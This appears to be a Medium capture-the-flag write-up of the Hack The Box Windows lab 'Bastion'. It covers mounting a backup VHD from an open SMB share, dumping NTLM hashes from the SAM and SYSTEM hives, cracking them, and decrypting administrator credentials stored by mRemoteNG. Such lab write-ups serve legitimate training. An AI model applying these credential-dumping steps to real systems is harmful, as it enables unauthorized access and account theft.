Hack The Box — Bastion

Bastion is a Medium difficulty rated Windows machine on Hack The Box and is also OSCP like.I would honestly rate this box between Medium to Hard and call it very tricky.In this machine we find smbshare and get a vhd file using guestmount.Then we find the SAM and SYSTEM folder and use pwdump/samdump to dump the hashes.Finally we privilege escalate via a remote connection software called mRemoteNG which was preinstalled in the target as it stores admin username and password in a pirticular place.

ENUMERATION

We find that port 22,135,445 are open.

I firstly try using “smbmap -H 10.10.10.134” to list shares however anonymous listing of shares in not allowed.When i try using smbclient, it works ! As you can see, we can access the share called Backups

And we can upload files here as well as you can see below.My plan was to upload an ASPX shell and execute it however that did’nt work.

Within the Backups folder, i had downloaded a file called note.txt with the following contents:

Upon deeper search through the Backups directory, i found various files and 2 interesting files.

These are these vhd files.A VHD file contains a virtual hard disk image used by Microsoft Windows Virtual PC, a Windows virtualization program. It stores the contents of a hard disk.Due to the huge size, we cannot download it directly.Instead we will have to mount it in our kali.

NOTE: For this part of mounting vhd files, i was unable to install guestmount as kali was missing packages and i had to update and upgrade my kali which takes a lot of time.Therefore i have provided screenshots from another writeup(https://www.hebunilhanli.com/wonderland/htb-bastion/)

DO READ THIS GUIDE FOR MOUNTING VHD FILES-https://medium.com/@klockw3rk/mounting-vhd-file-on-kali-linux-through-remote-share-f2f9542c1f25

As a result of examinations, we found that backups of a computer had been taken inside the Backups folder. We need to get the files out of the SMB and mount them. Because access to these devices cannot be accessed by typing the ip address of the storage system into the folder head, such as in Windows. We need to mount this device on our computer like a disk. Also, if we take into account the warning given by the sysadmin,(in note.txt) it may take a long time to get these files. You can follow mount operations below;

sudo apt-get install cifs-utils (to Install cift-utils packet)

sudo mkdir mnt/bastion_local_share/ (A new folder is created for the device to be mounted on.)

mount -t cifs //10.10.10.134/Backups mnt/bastion_local_share/ (To mount via the SMB)

As you can see in the image above,there are two vhd images in the SMB. The “guestmount” tool will be used to connect virtual machine file systems to our computer.

sudo apt-get install libguestfs-tools (Libguestfs package needs to be installed for access to guest file system)

sudo guestmount –add 9b9cfbc4–369e-11e9-a17c-806e6f6e6963.vhd –ro bastion_vhd_share/ -m /dev/sda1

After the extraction process is finished, we examine the files within the virtual machine as root users.

Initial Foothold

What to do next will be shaped by your knowledge of the system. In the Windows operating system, authentication of user accounts takes place with the SAM (Security Account Manager) file. The SAM file is encrypted with a key called SYSKEY in the SYSTEM file. The encrypted SAM file contains LM and NTLM password summaries of local user accounts.The global location of the SAM and SYSTEM file is Windows/System32/config/

After copying SAM and SYSTEM files to our own machine, we can use samdump2 tool or pwdump to detect NTML hash.

We got the LM and NT hashes of user L4mpje

To crack the NT hash, we can use crackstation or even john or hashcat

Since we have found the password, we can SSH into L4mpje

I was unable to transfer WINPEAS to the target and it showed “access dened”

The priv esc part is tricky as well.There is a unusual program installed called mRemoteNG, which is basically a remote connection session manager.This application saves your IP address, username and password information, making it easy to connect to your servers.

read the last lines

We also find that the logged in user credentials are stored in confCons.xml file and also where it is located (look at the image below)

ALL we have to do is head towards the directory and see the contents of confCons.xml file and immediately we find the credentials of Administrator

However it is not just base64 encoded. In order to decrypt it, we need to google and we will immediately find a github tool written in python for decrypting the credentials stored by mRemoteNG.

LINK-https://github.com/haseebT/mRemoteNG-Decrypt

See the last line for usage

We run it which putting the password string in (-s) and we immediately get the password in clear text !!!

Since it is the password for the Administrator, we can simply use it to SSH into admin.

We are Now Admin User !!!! The root flag can be found in /Desktop

CONCLUSION

I hope you learned a lot from this writeup.I honestly found this machine pretty challenging as it requires very deep enumeration in order to be solved by your own.We learned about mounting vhd files in our kali.We also learned about mRemoteNG and how to abuse it to find encrypted credentials.

Make sure you follow me here on Medium for more such writeups,Until next time- ZEUS

--

--

--

I am a Penetration Tester, Currently pursuing OSCP. Skilled in Network Pen-testing and Developing Hacking Tools using Python.I Share my Knowledge on YouTube

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ZeusCybersec

ZeusCybersec

I am a Penetration Tester, Currently pursuing OSCP. Skilled in Network Pen-testing and Developing Hacking Tools using Python.I Share my Knowledge on YouTube

More from Medium

Hack The Box — Devel

TryHackMe — Year of the Rabbit Write-Up

HacktheBox [Toolbox]

HTB Write-up Jeeves (Windows) File Transferring with SMB file share(impacket tool), Poweshell &…